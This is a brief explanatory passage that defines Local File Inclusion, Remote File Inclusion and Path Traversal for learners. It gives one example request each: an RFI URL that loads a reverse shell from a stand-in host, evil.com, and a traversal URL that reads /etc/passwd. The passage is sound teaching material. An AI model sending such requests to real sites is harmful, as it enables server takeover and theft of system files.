- Local File Inclusion (LFI)
Local Fie Inclusion (LFI) is a vulnerability that allows an attacker to include files that are already present on the server through the web server. This type of attack typically targets web applications that use file paths as input without proper validation. The cybercriminal can upload a file to the website and then execute it like http://example.com/index.php?page=/uploads/malicious.php
- Remote File Inclusion (RFI)
Remote File Inclusion (RFI) is a vulnerability that allows an attacker to include a remote file, usually through a web script. This file could be malicious, and the attacker can execute it on the server gaining control over the server. The cybercriminal can build a reverse shell and upload it to his website and then access it with http://victim.com/index.php?pahe=http://evil.com/malicious.php.
- Path Traversal
Path traversal (also known as Directory Traversal) is a vulnerability that allows an attacker to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with ‘../’ sequences and similar variations, cybercriminals can traverse directories to access unauthorized files. The cybercriminal can access the /etc/passwd by navigating up the directory tree with http://example.com/index.php?file=../../../../etc/passwd.
, Remote File Inclusion (RFI), and Path Traversal.){kind=link}